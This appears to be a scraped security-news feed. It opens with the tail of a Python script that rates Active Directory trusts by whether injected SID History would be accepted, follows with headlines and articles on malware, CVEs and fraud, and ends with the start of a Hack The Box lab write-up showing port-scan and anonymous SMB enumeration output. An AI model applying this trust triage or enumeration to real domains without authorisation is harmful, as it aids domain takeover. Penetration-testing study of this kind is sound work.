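    """Triage one trust record by whether SID filtering on it would strip
    injected SIDs. Keys expected: name, trustAttributes, trustDirection."""
    flags = decode_trust_attributes(trust["trustAttributes"])
    if "QUARANTINED_DOMAIN" in flags:
        risk = "low"
        why = "SID filtering (quarantine) enforced: SIDs from other domains are stripped"
    elif "WITHIN_FOREST" in flags:
        risk = "high"
        why = ("intra-forest trust without quarantine: the forest, not the domain, is the "
               "security boundary, so SID History injected from a compromised child domain "
               "is accepted by the parent")
    elif "FOREST_TRANSITIVE" in flags:
        risk = "medium"
        why = ("forest trust: RID < 1000 SIDs such as Enterprise Admins from the other forest "
               "are filtered by default; RID >= 1000 SID History passes only if it was enabled "
               "on the trust (netdom trust /enablesidhistory)")
    else:
        risk = "high"
        why = "external trust without the quarantine flag: SID History is honoured"
    return {
        "name": trust["name"],
        "direction": TRUST_DIRECTION.get(trust["trustDirection"], "unknown"),
        "flags": flags,
        "risk": risk,
        "why": why,
    }


# Constructed records (not from the lab) in the shape of trustedDomain objects
SAMPLE_TRUSTS = [
    {"name": "child.corp.test",   "trustAttributes": 0x20,        "trustDirection": 3},
    {"name": "partner.corp.test", "trustAttributes": 0x08,        "trustDirection": 3},
    {"name": "legacy.corp.test",  "trustAttributes": 0x04 | 0x01, "trustDirection": 1},
    {"name": "vendor.corp.test",  "trustAttributes": 0x80,        "trustDirection": 2},
]


def report(trusts=SAMPLE_TRUSTS) -> list[dict]:
    """Assess every trust, print a one-line summary each, and return the results."""
    results = [assess_trust(t) for t in trusts]
    for r in results:
        print(f"{r['name']:<20} {r['direction']:<13} {r['risk']:<6} {','.join(r['flags'])}")
        print(f"    {r['why']}")
    return results


if __name__ == "__main__":
    report()
```

To run it against a real forest, export Name and TrustAttributes from Get-ADTrust -Filter * (TrustAttributes is the same integer) and map Direction back to the 0 to 3 trustDirection value; a trust that comes out "high" is where the SID History step of the cheatsheet is expected to work, and "low" is where the parent or partner domain will strip the injected SID.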
by InfoSec Write-ups
2025-02-18 05:00:22
Threat Spotlight: Inside the World’s Fastest Rising Ransomware Operator — BlackLock
by ReliaQuest
2025-02-18 04:59:08
I Pasted a Simple HTML Code on BookMyShow… and Got ₹1000 for It!
Continue reading on InfoSec Write-ups »
by InfoSec Write-ups
2025-02-18 04:04:00
The big 6: Essential financial regulations security leaders should know
In this blog, we cover the biggest international laws and standards security leaders should know about in 2025.
by Hack The Box Blog
2025-02-18 00:00:00
Getting Started Using LLMs in Application Testing With an MVP
Are you interested in incorporating Large Language Models (LLMs) into app tests yet lack the tooling to get you there? This blog walks through how to start using effective LLM attacks today.
by TrustedSec
2025-02-17 23:59:00
Last Week in Security (LWiS) - 2025-02-17
PAN-OS auth bypass (@hash_kitten), Outlook drafts as C2 (@elasticseclabs), Ludus powered SocGholish analysis (@RussianPanda9xx), kernel UAF (@h0mbre_), and more!
by Bad Sector Labs
2025-02-17 23:28:05
Duo Wins $50K Bug Bounty for Supply Chain Flaw in Newly Acquired Firm
Researchers earned a $50,500 Bug Bounty after uncovering a critical supply chain flaw in a newly acquired firm,…
by Hackread
2025-02-17 22:00:00
Microsoft Uncovers New XCSSET macOS Malware Variant with Advanced Obfuscation Tactics
Microsoft said it has discovered a new variant of a known Apple macOS malware called XCSSET as part of limited attacks in the wild. "Its first known variant since 2022, this latest XCSSET malware features enhanced obfuscation methods, updated persistence mechanisms, and new infection strategies," the Microsoft Threat Intelligence team said in a post shared on X. "These enhanced features add to
by The Hacker News
2025-02-17 20:55:38
Dutch Police shut down bulletproof hosting provider Zservers and seized 127 servers
Dutch police seized 127 servers of the bulletproof hosting service Zservers/XHost after government sanctions. On February 11, 2025, the US, UK, and Australia sanctioned a Russian bulletproof hosting services provider and two Russian administrators because they supported Russian ransomware LockBit operations. Alexander Igorevich Mishin and Aleksandr Sergeyevich Bolshakov are the two Russian nationals and administrators of Zservers. […]
by Security Affairs
2025-02-17 20:45:01
Holiverse Makes NASA's Latest Achievements Accessible to Everyone
People around the world learned about the latest advancements in the American space industry! This was made possible…
by Hackread
2025-02-17 18:41:06
New Golang-based backdoor relies on Telegram for C2 communication
Netskope Threat Labs researchers discovered a Golang-based backdoor using Telegram for C2 communication, possibly of Russian origin. The malware, still in development but functional, exploits cloud apps to evade detection. The experts believe the new Go backdoor could have a Russian origin. Upon executing […]
by Security Affairs
2025-02-17 18:18:10
Windows' Classic 3D Maze Screensaver Revived as Playable Game
A nostalgic piece of computing history has been brought back to life, and this time, it's interactive. A developer known as "x86matthew" has turned the classic Windows 9x 3D Maze screensaver into a fully playable game. The project, which was shared in a tweet over the weekend, is a re-engineered version of the original screensaver, …
by Cyber Insider
2025-02-17 18:15:34
Industry Moves for the week of February 17, 2025 - SecurityWeek
Explore industry moves and significant changes in the industry for the week of February 17, 2025. Stay updated with the latest industry trends and shifts.
by SecurityWeek
2025-02-17 18:02:35
X Blocks Signal.me Links Citing Security Concerns
X (formerly Twitter) has begun blocking links to Signal.me, a domain used by the encrypted messaging platform Signal to facilitate direct user contact. The restriction applies to public posts, direct messages, and even user bios, triggering various error messages when users attempt to share a Signal.me link. Existing links now display a warning page labeling …
by Cyber Insider
2025-02-17 17:57:26
🐝 Hive Five 211 - Stop Working So Hard
The Pentesting Pastor, Hunting for DOMPurify Misconfigurations, Hack Like a Pirate, Google AI Studio Walkthrough, Speak at 92 Beats Per Minute
by Hive Five
2025-02-17 17:06:00
South Korea Suspends DeepSeek AI Downloads Over Privacy Violations
South Korea has formally suspended new downloads of Chinese artificial intelligence (AI) chatbot DeepSeek in the country until the service makes changes to its mobile apps to comply with data protection regulations. Downloads have been paused as of February 15, 2025, 6:00 p.m. local time, the Personal Information Protection Commission (PIPC) said in a statement. The web service remains
by The Hacker News
2025-02-17 16:30:00
CISO's Expert Guide To CTEM And Why It Matters
Cyber threats evolve—has your defense strategy kept up? A new free guide available here explains why Continuous Threat Exposure Management (CTEM) is the smart approach for proactive cybersecurity. This concise report makes a clear business case for why CTEM's comprehensive approach is the best overall strategy for shoring up a business's cyber defenses in the face of evolving attacks. It also
by The Hacker News
2025-02-17 16:05:22
U.S. Military and Defense Contractors Hit by Infostealer Malware
Hudson Rock has exposed widespread infostealer malware infections affecting employees in the U.S. military, government agencies, and major defense contractors. The findings reveal that compromised credentials — available for as little as $10 on cybercrime marketplaces — could be exploited to gain unauthorized access to classified networks, VPNs, email systems, and development tools. Hudson Rock's …
by Cyber Insider
2025-02-17 15:45:04
UAE Among Most Targeted Countries by Malware Attacks
In December 2024, the United Arab Emirates (UAE) emerged as one of the most targeted nations for malware attacks, according to Acronis' latest Cyberthreats Report. The report highlights a 197% surge in email-based cyberattacks globally during the second half of 2024 compared to the same period in 2023.
by Zendata
2025-02-17 15:29:50
Chase will soon block Zelle payments to sellers on social media
JPMorgan Chase Bank (Chase) will soon start blocking Zelle payments to social media contacts to combat a significant rise in online scams utilizing the service for fraud. [...]
by BleepingComputer
2025-02-17 14:49:00
⚡ THN Weekly Recap: Google Secrets Stolen, Windows Hack, New Crypto Scams and More
Welcome to this week's Cybersecurity News Recap. Discover how cyber attackers are using clever tricks like fake codes and sneaky emails to gain access to sensitive data. We cover everything from device code phishing to cloud exploits, breaking down the technical details into simple, easy-to-follow insights. ⚡ Threat of the Week: Russian Threat Actors Leverage Device Code Phishing to Hack
by The Hacker News
2025-02-17 14:36:37
Hackers Exploit Telegram API to Spread New Golang Backdoor
The new Golang backdoor uses Telegram for command and control. Netskope discovers malware that exploits Telegram's API for…
by Hackread
2025-02-17 14:35:56
CVE-2025-21415 & CVE-2025-21396: Microsoft Addresses Critical Security Risks
Cloud-based platforms and AI-driven services remain in the crosshairs of attackers. Recently, Microsoft released a security advisory addressing two vulnerabilities affecting Azure AI Face Service (CVE-2025-21415) and Microsoft Account (CVE-2025-21396). These flaws could allow attackers to escalate privileges under specific conditions, leading to unauthorized access and system compromise. Given the increasing reliance on AI and cloud technologies, understanding these vulnerabilities and their implications is crucial for organizations and security professionals.

Overview of the Vulnerabilities
Microsoft identified and patched two security vulnerabilities that could have led to privilege escalation:

1. CVE-2025-21396 (Microsoft Account Elevation of Privilege Vulnerability)
   Severity Score: 7.5 (CVSS)
   Cause: Missing authorization checks in Microsoft Accounts.
   Risk: An unauthorized attacker could exploit this flaw to elevate privileges over a network.
   Discovery: Reported by security researcher Sugobet.

2. CVE-2025-21415 (Azure AI Face Service Elevation of Privilege Vulnerability)
   Severity Score: 9.9 (CVSS)
   Cause: Authentication bypass via spoofing in Azure AI Face Service.
   Risk: An authorized attacker could leverage this flaw to gain elevated privileges over a network.
   Discovery: Reported by an anonymous researcher.

The existence of a proof-of-concept (PoC) exploit, confirming its exploitability, further emphasizes the critical nature of CVE-2025-21415.

Potential Impact of These Vulnerabilities
Exploiting these vulnerabilities could allow attackers to:
- Gain unauthorized access to Microsoft Account services.
- Escalate privileges within Azure AI Face Service, potentially compromising sensitive data.
- Bypass authentication measures and execute malicious activities.
- Conduct large-scale attacks on cloud-based services.

Given the severity of these vulnerabilities, organizations using Azure AI and Microsoft Account services must understand the risks and take necessary precautions.

Microsoft's Response and Mitigation Efforts
Microsoft has fully mitigated these vulnerabilities, ensuring that they no longer pose a risk to users. The company confirmed that:
- No customer action is required, as patches have been applied directly to the affected services.
- The vulnerabilities were addressed in accordance with security best practices.
- Transparency remains a priority, ensuring users are aware of cybersecurity risks and mitigations.

Microsoft emphasized the importance of transparency in cloud security, stating: "By openly sharing information about vulnerabilities that are discovered and resolved, we enable Microsoft and our partners to learn and improve. This collaborative effort contributes to the safety and resilience of our critical infrastructure."

Why This Matters for Cloud Security
The discovery and mitigation of these vulnerabilities underscore critical issues in cloud security:
- Growing Target on Cloud-Based AI Services – Attackers are increasingly targeting AI-driven platforms, making security patches vital.
- Privilege Escalation Risks – Gaining elevated privileges can lead to unauthorized access to critical systems and data breaches.
- PoC Exploits Confirm Attack Feasibility – The existence of an exploit for CVE-2025-21415 highlights the importance of rapid vulnerability mitigation.
- Industry Transparency in Security Disclosures – Microsoft's open disclosure of vulnerabilities sets a precedent for cloud security providers.

Best Practices for Organizations Using Azure AI and Microsoft Services
While Microsoft has addressed these issues, organizations should remain proactive in their cybersecurity approach. Recommended actions include:
- Monitoring Security Updates: Stay informed about Microsoft security advisories and apply patches promptly.
- Implementing Privileged Access Management (PAM): Restrict user permissions to minimize unauthorized privilege escalation risks.
- Adopting a Zero-Trust Security Model: Enforce strict access controls and authentication measures.
- Conducting Regular Security Audits: Identify and remediate potential vulnerabilities in cloud environments.
- Using Continuous Monitoring Tools: Detect abnormal activities that may indicate security threats.

Industry Implications and the Future of Cloud Security
The swift mitigation of these vulnerabilities highlights Microsoft's commitment to cloud security. However, it also underlines the broader cybersecurity challenges associated with cloud-based services. As AI-driven applications become more prevalent, businesses must:
- Adopt strong security frameworks to protect their digital infrastructure.
- Enhance real-time threat detection mechanisms.
- Continuously refine access control policies to mitigate privilege escalation risks.

Organizations relying on Azure AI Face Service and Microsoft authentication systems should stay vigilant, monitor security advisories, and ensure compliance with security best practices to safeguard their digital assets.

Conclusion
The discovery and mitigation of CVE-2025-21415 and CVE-2025-21396 highlight the ever-present cybersecurity risks in cloud-based AI services. While Microsoft has proactively addressed these vulnerabilities, organizations must continue prioritizing cybersecurity to prevent potential exploitation. Staying informed, implementing best practices, and fostering a culture of cybersecurity awareness will be crucial in mitigating future risks.

Source:
https://www.mycert.org.my/portal/advisory?id=MA-1259.022025
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-21396
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-21415
by CYBLE
2025-02-17 14:34:00
New Golang-Based Backdoor Uses Telegram Bot API for Evasive C2 Operations
Cybersecurity researchers have shed light on a new Golang-based backdoor that uses Telegram as a mechanism for command-and-control (C2) communications. Netskope Threat Labs, which detailed the functions of the malware, described it as possibly of Russian origin. "The malware is compiled in Golang and once executed it acts like a backdoor," security researcher Leandro Fróes said in an analysis
by The Hacker News
2025-02-17 14:26:33
Trojanized game PirateFi discovered on Steam | Kaspersky official blog
Trojanized game PirateFi lasted four days on Steam.
by Kaspersky
2025-02-17 14:00:00
Helping civil society monitor attacks with the CyberPeaceTracer and Cloudflare Email Security
We're proud to collaborate with CyberPeace Institute by powering its latest initiative, the CyberPeace Tracer, a platform that enables civil society organizations to proactively report cyber threats.
by Cloudflare
2025-02-17 13:50:37
Microsoft to remove the Location History feature in Windows
Microsoft announced the deprecation of the Location History feature from Windows, which let applications like the Cortana virtual assistant fetch the location history of the device. [...]
by BleepingComputer
2025-02-17 13:42:13
10 Key SOC Challenges and How AI Addresses Them
SOC challenges like alert fatigue, skill shortages and slow response impact cybersecurity. AI-driven solutions enhance SOC efficiency, automation…
by Hackread
2025-02-17 13:39:02
New FinalDraft Malware Spotted in Espionage Campaign
A newly identified malware family abuses the Outlook mail service for communication, via the Microsoft Graph API.
by SecurityWeek
2025-02-17 13:19:30
Defending against living-off-the-land attacks: Anomaly detection in action
Discover how Darktrace detected and responded to cyberattacks using Living-off-the-Land (LOTL) tactics to exploit trusted services and tools on customer networks.
by Darktrace
2025-02-17 13:00:00
Phishing for Love: A Sharp Surge in Valentine's Day-Themed Scams
Authors: Martin Kraemer, Security Awareness Advocate at KnowBe4 and James Dyer, Threat Intelligence Lead at KnowBe4. This Valentine's Day, Cupid wasn't the only one taking aim. Our Threat Research team noted a 34.8% increase in Valentine-related threat traffic in comparison to February of 2024.
by KnowBe4
2025-02-17 12:56:30
HashFlare Fraud: Two Estonians Admit to Running $577M Crypto Scam
Two Estonian nationals plead guilty to a $577M cryptocurrency Ponzi scheme through HashFlare, defrauding hundreds of thousands globally.…
by Hackread
2025-02-17 12:39:55
X now blocks Signal contact links, flags them as malicious
Social media platform X (formerly Twitter) is now blocking links to "Signal.me," a URL used by the Signal encrypted messenger to share your account info with another person. [...]
by BleepingComputer
2025-02-17 12:10:41
Microsoft Active Directory Domain Services CVE-2025-21293 Vulnerability Explained
In January 2025, Microsoft disclosed and patched a critical privilege escalation vulnerability affecting Microsoft's Active Directory Domain Services (AD DS) as part of Patch Tuesday. Although CVE-2025-21293 was discovered in September 2024, the public release of the proof-of-concept (PoC) exploit has heightened concerns, and adversaries were observed to exploit the vulnerability in the wild. Given the widespread reliance on Active Directory for authentication and authorization in corporate networks, organizations are strongly advised to apply the latest security patches promptly.
by Picus Security
2025-02-17 12:02:40
17th February – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 17th February, please download our Threat Intelligence Bulletin. TOP ATTACKS AND BREACHES: SimonMed Imaging, one of the largest diagnostic imaging companies in the US, has been breached by Medusa ransomware group, resulting in the theft of over 212 GB of sensitive data from its […]
by Check Point Research
2025-02-17 11:56:58
IT Vulnerability Report: Ivanti, Apple Fixes Urged by Cyble

Overview
Cyble's vulnerability intelligence report to clients last week highlighted flaws in Ivanti, Apple, Fortinet, and SonicWall products. The report from Cyble Research and Intelligence Labs (CRIL) examined 22 vulnerabilities and dark web exploits, including some with significant internet-facing exposures. Microsoft had a relatively quiet Patch Tuesday, with the most noteworthy fixes being for two actively exploited zero-day vulnerabilities (CVE-2025-21391, a Windows Storage Elevation of Privilege Vulnerability, and CVE-2025-21418, a Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability), but other IT vendors also issued updates on the second Tuesday of the month. Both Microsoft vulnerabilities were added to CISA's Known Exploited Vulnerabilities catalog. Cyble's vulnerability intelligence unit highlighted five new vulnerabilities as meriting high-priority attention by security teams, plus a month-old vulnerability at elevated risk of attack.

The Top IT Vulnerabilities
Three of the vulnerabilities highlighted by Cyble (CVE-2025-22467, CVE-2024-38657, and CVE-2024-10644) affect Ivanti Connect Secure (ICS), a secure remote access solution, and Ivanti Policy Secure (IPS), a network access control (NAC) solution. CVE-2025-22467 is a stack-based buffer overflow vulnerability in ICS that could allow remote authenticated attackers with low privileges to execute code. CVE-2024-10644 is a code injection vulnerability that could allow remote code execution in ICS and IPS by remote authenticated attackers. CVE-2024-38657 is an external control of file name vulnerability that could enable remote authenticated attackers to perform arbitrary file writes in ICS and IPS.

CVE-2025-24200 is a zero-day authorization vulnerability affecting multiple generations of iPhones and iPads that can be exploited to disable Apple's USB Restricted Mode. Apple stated that it is aware of a report indicating that the issue may have been exploited in "an extremely sophisticated attack against specific targeted individuals."

CVE-2025-24472 is an authentication bypass using an alternate path or channel vulnerability affecting FortiOS 7.0.0 through 7.0.16 and FortiProxy 7.2.0 through 7.2.12 and 7.0.0 through 7.0.19, and may allow a remote attacker to gain super-admin privileges via crafted CSF proxy requests. Fortinet customers who previously upgraded for the CVE-2024-55591 vulnerability are protected from the new issue.

CVE-2024-53704 is an improper authentication vulnerability in the SSLVPN authentication mechanism of SonicWall NSv devices and certain other SonicWall firewall products that could allow a remote attacker to bypass authentication and gain unauthorized access to secure networks. Cyble noted that the recent public release of exploit code for the vulnerability significantly increases the risk of exploitation attempts, making immediate patching essential. Cyble noted that a large number of internet-facing devices may be vulnerable.

Cyble Recommendations
To protect against these vulnerabilities and exploits, Cyble recommends that organizations implement the following best practices:
- Regularly update all software and hardware systems with the latest patches from official vendors.
- Develop a comprehensive patch management strategy that includes inventory management, patch assessment, testing, deployment, and verification. Automate the process where possible to ensure consistency and efficiency.
- Divide your network into distinct segments to isolate critical assets from less secure areas. Use firewalls, VLANs, and access controls to limit access and reduce the attack surface exposed to potential threats.
- Create and maintain an incident response plan that outlines procedures for detecting, responding to, and recovering from security incidents, including ransomware-resistant backups. Regularly test and update the plan to ensure its effectiveness and alignment with current threats.
- Implement comprehensive monitoring and logging solutions to detect and analyze suspicious activities. Use SIEM (Security Information and Event Management) systems to aggregate and correlate logs for real-time threat detection and response.
- Subscribe to security advisories and alerts from official vendors, CERTs, and other authoritative sources. Regularly review and assess the impact of these alerts on your systems and take appropriate actions.
- Conduct regular vulnerability assessment and penetration testing (VAPT) exercises to identify and remediate vulnerabilities in your systems. Complement these exercises with periodic security audits to ensure compliance with security policies and standards.

Conclusion
Security teams should prioritize actively exploited vulnerabilities, and those at high risk of exploitation, when determining their patching efforts. They should also consider other indicators of risk, such as web exposure and data and application sensitivity. Implementing strong security practices is essential for protecting sensitive data and maintaining system integrity. A comprehensive threat intelligence solution like Cyble can monitor for threats, exposures, and leaks specific to your environment, allowing you to respond quickly to events and prevent them from becoming wider incidents. To access full IT vulnerability and other reports from Cyble, click here.
by CYBLE
2025-02-17 11:29:38
ExpressVPN Rewrites Lightway VPN Protocol in Rust for Security
ExpressVPN has reimplemented its Lightway VPN protocol in Rust, replacing the original C-based implementation. The move aims to enhance security, improve performance, and make future expansions more efficient. To validate the security of the rewritten protocol, ExpressVPN commissioned independent audits by Cure53 and Praetorian, both of which confirmed the integrity of the new implementation. A …
by Cyber Insider
2025-02-17 11:24:11
All the scams and safety tips you need to know about when buying meme coins | Kaspersky official blog
How meme cryptocurrencies work (TRUMP, MELANIA, and others), and how not to get duped.
by Kaspersky
2025-02-17 11:04:51
Microsoft spots XCSSET macOS malware variant used for crypto theft
A new variant of the XCSSET macOS modular malware has emerged in attacks that target users' sensitive information, including digital wallets and data from the legitimate Notes app. [...]
by BleepingComputer
2025-02-17 10:51:03
$577 Million Cryptocurrency Fraud: Two Estonians Admit Role in Global Ponzi Scheme
Two Estonian nationals have admitted their roles in planning a massive cryptocurrency Ponzi scheme that defrauded hundreds of thousands of investors worldwide, including numerous individuals in the United States. Sergei Potapenko and Ivan Turõgin, both 40, pleaded guilty to charges related to their operation of HashFlare, a cryptocurrency mining service. As part of their plea agreement, the defendants have committed to forfeit assets valued at more than $400 million, marking a significant victory for law enforcement in tackling the growing threat of cryptocurrency fraud.

The Scheme: A Deceptive Cryptocurrency Mining Operation
Between 2015 and 2019, Potapenko and Turõgin ran HashFlare, selling customers contracts that promised a share of the cryptocurrency mined by the service. Cryptocurrency mining—the process of using computer systems to generate digital currency such as Bitcoin—was the front for their fraudulent operation. The defendants lacked the computing power to perform the mining they claimed; instead, they fabricated the data displayed on HashFlare's web-based dashboard, misleading customers into believing they were earning returns on their investments. Despite not having the capacity to mine the cryptocurrencies as advertised, the scheme was remarkably profitable, generating more than $577 million in sales. Potapenko and Turõgin funneled the proceeds into lavish assets, purchasing real estate and luxury vehicles and maintaining various cryptocurrency and investment accounts.

Massive Losses for Victims Worldwide
The impact of the scheme was devastating, with hundreds of thousands of victims losing their hard-earned money. The victims, who were drawn into the scheme by promises of high returns from cryptocurrency mining, were left with nothing as the defendants' fraudulent activities continued unchecked for years. As a result, the forfeited assets, valued at over $400 million, will now be made available through a remission process, which is expected to help compensate the defrauded investors. The details of the remission process will be announced at a later date.

Potapenko and Turõgin each pleaded guilty to one count of conspiracy to commit wire fraud. Under U.S. law, they each face up to 20 years in prison. However, the final sentence will be determined by a federal district court judge, who will consider various factors, including the U.S. Sentencing Guidelines, before imposing any penalties. Sentencing is scheduled for May 8, 2025.

International Efforts in Combating Cybercrime
This case highlights the increasingly global nature of cryptocurrency fraud and the importance of international cooperation in combating cybercrime. The Justice Department credited multiple agencies for their significant roles in bringing the defendants to justice. The Cybercrime Bureau of the Estonian Police and Border Guard played a critical role in gathering evidence, while the Estonian Prosecutor General and Ministry of Justice and Digital Affairs were instrumental in facilitating the extradition process. Additionally, the Justice Department's Office of International Affairs provided crucial assistance in ensuring the defendants were brought to the United States for prosecution. Antoinette T. Bacon, Supervisory Official of the Justice Department's Criminal Division, expressed the department's commitment to combating cryptocurrency fraud: "This case underscores the importance of international collaboration to hold individuals accountable for exploiting the digital economy for fraudulent purposes."

FBI's Key Role in the Investigation
The Federal Bureau of Investigation (FBI) played a pivotal role in the investigation, with its Seattle Field Office leading the charge. Chad Yarbrough, Assistant Director of the FBI's Criminal Investigative Division, stressed the importance of tackling cryptocurrency fraud schemes, stating, "The FBI will continue to prioritize the investigation of cybercrime and cryptocurrency fraud that targets individuals and organizations worldwide." Mike Herrington, Special Agent in Charge of the FBI's Seattle Field Office, further emphasized the FBI's commitment to addressing fraud in emerging technologies: "This case serves as a stark reminder that even those operating in the digital realm are not beyond the reach of the law."

Cryptocurrency Fraud: A Growing Concern
The guilty pleas of Potapenko and Turõgin warn of the dangers of cryptocurrency-related scams, which have become increasingly prevalent in recent years. As the digital currency market grows, criminals have more opportunities to exploit unsuspecting individuals. Cryptocurrency mining services, once viewed as legitimate investment opportunities, have become a popular front for fraudulent schemes promising large returns. This case is one of many that highlight the need for greater consumer protection and regulatory oversight in the cryptocurrency industry. As digital currencies continue to rise in popularity, both regulators and consumers must remain vigilant against fraudulent schemes designed to take advantage of the unregulated space.
by The Cyber Express
2025-02-17 10:27:41
Microsoft to Deprecate Location History Feature in Windows
Microsoft has announced the deprecation and eventual removal of the Location History feature in Windows, which allowed applications, including Cortana, to access 24 hours of stored device location data. This change, set to take effect this month, will remove the corresponding settings from the Privacy & Security > Location page in Windows Settings, and location …
by Cyber Insider
2025-02-17 10:14:18
Pro-Russia collective NoName057(16) launched a new wave of DDoS attacks on Italian sitesPro-Russia collective NoName057(16) launched DDoS attacks on Italian sites, targeting airports, the Transport Authority, major ports, and banks. The pro-Russia hacker group NoName057(16) launched a new wave of DDoS attacks this morning against multiple Italian entities. The group targeted the websites of Linate and Malpensa airports, the Transport Authority, the bank Intesa San Paolo, and […]
by Security Affairs
2025-02-17 09:37:06
Android 16 Takes Action Against Scammers with In-Call Security Features

Google is working to enhance the security of its mobile operating system, focusing on preventing scammers from exploiting certain phone features during calls. One key feature of Android 16 aims to block actions like sideloading apps or enabling accessibility access during an active phone call, both of which are commonly used by scammers to gain control of victims’ devices. The growing prevalence of online scams, fueled by advanced tools like AI-driven speech synthesis, has put many users at risk. Scammers are increasingly relying on psychological manipulation to convince unsuspecting individuals to share personal information, send money, or install harmful apps. This has prompted Google to develop a new security feature for Android 16 to make it harder for scammers to succeed. Through this update, Android 16 prevents users from changing certain sensitive settings while they’re on a call. Two of the settings most targeted by scammers are sideloading apps and enabling accessibility access. Sideloading, which allows apps to install other apps from sources outside the Google Play Store, is often used to distribute malware. Accessibility access, on the other hand, gives apps the power to read a user’s screen and perform actions on their behalf, essentially handing over control of the device.

How the Feature Works in Android 16 Beta 2

Google has already rolled out these in-call protections in Android 16 Beta 2, offering users a preview of the upcoming feature. During an active phone call, Android will now block any attempts to sideload apps or grant accessibility access. This is particularly important since scammers typically try to walk victims through the sideloading process over the phone. A closer look at Android 16 Beta 2 reveals a warning message that appears when users attempt to enable the sideloading feature during a call. The message advises users that this action is commonly requested by scammers and urges caution when guided by unknown callers. This alert could serve as a red flag, prompting users to reconsider the legitimacy of the call. Furthermore, sideloading permissions are disabled by default, adding another layer of protection.

Added Protection Against Malicious Permissions

Even if a victim has already enabled sideloading or downloaded a malicious app, Android 16 goes further by blocking the granting of accessibility access during calls. This step is crucial because, once an app has this level of control, it can take over the phone and compromise the user’s privacy and security. Malicious apps that gain these permissions can perform harmful actions on behalf of the user, including stealing sensitive data or even locking the user out of their device. By preventing these changes during phone calls, Google aims to thwart scammers who attempt to install malware or obtain critical permissions during a conversation.

The Growing Threat of Online Scams

As online scams become more sophisticated, scammers are increasingly relying on phone calls to manipulate and defraud individuals. These scams often target older adults or those unfamiliar with digital security practices. The psychological tactics used by scammers—such as creating a sense of urgency or fear—can be highly effective in tricking victims into complying with their demands. Scammers might ask victims to install apps that promise to help with a supposed issue, such as in a fraudulent tech support call. Once the app is installed, the scammer gains access to the victim's device, potentially leading to further exploitation. With the introduction of these new security features in Android 16, Google is taking a proactive stance against such tactics. By making it harder for users to sideload apps or grant dangerous permissions during phone calls, Android hopes to reduce the effectiveness of these scams.

Conclusion

The security measures in Android 16 Beta 2 are set to be part of the full Android 16 release later in 2025, building on previous updates like Android 15's Enhanced Confirmation Mode. As scammers become more sophisticated, these new features—such as blocking sideloading permissions and restricting accessibility during calls—represent a vital step in Google's ongoing effort to protect users. By introducing these protective layers, Android 16 not only strengthens defenses against online scams but also empowers users to stay safe.
by The Cyber Express
2025-02-17 09:05:02
whoAMI attack could allow remote code execution within AWS accountResearchers warn that the whoAMI attack lets attackers publish an AMI with a specific name to execute code in an AWS account. Cybersecurity researchers at Datadog Security Labs devised a new name confusion attack technique, called whoAMI, that allows threat actors to execute arbitrary code execution within the Amazon Web Services (AWS) account by publishing […]
by Security Affairs
2025-02-17 08:21:58
Cicada HTB Writeup

Enumeration

Rust Scan

PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack Simple DNS Plus
88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2025-02-15 11:11:20Z)
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Issuer: commonName=CICADA-DC-CA/domainComponent=cicada
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-22T20:24:16
| Not valid after: 2025-08-22T20:24:16
| MD5: 9ec51a2340efb5b83d2c39d8447ddb65
| SHA-1: 2c936d7bcfd811b99f711a5a155d88d34a52157a
445/tcp open microsoft-ds? syn-ack
464/tcp open kpasswd5? syn-ack
593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Issuer: commonName=CICADA-DC-CA/domainComponent=cicada
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-22T20:24:16
| Not valid after: 2025-08-22T20:24:16
| MD5: 9ec51a2340efb5b83d2c39d8447ddb65
| SHA-1: 2c936d7bcfd811b99f711a5a155d88d34a52157a
3268/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
3269/tcp open ssl/ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
5985/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
63150/tcp open msrpc syn-ack Microsoft Windows RPC
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows

The open ports suggest that the target is a Windows Active Directory (AD) server with SMB, Kerberos, LDAP, and WinRM enabled. Since Kerberos (88, 464), LDAP (389, 636), Global Catalog (3268, 3269), DNS (53), and SMB (445) are open, this system is almost certainly a Windows Active Directory Domain Controller.

SMB Client

Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
DEV Disk
HR Disk
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share

Tried accessing the DEV and HR shares:

smbclient \\\\cicada.htb\\DEV -N
Try "help" to get a list of possible commands.
smb: \> ls
NT_STATUS_ACCESS_DENIED listing \*

Let's try the same on the HR share:

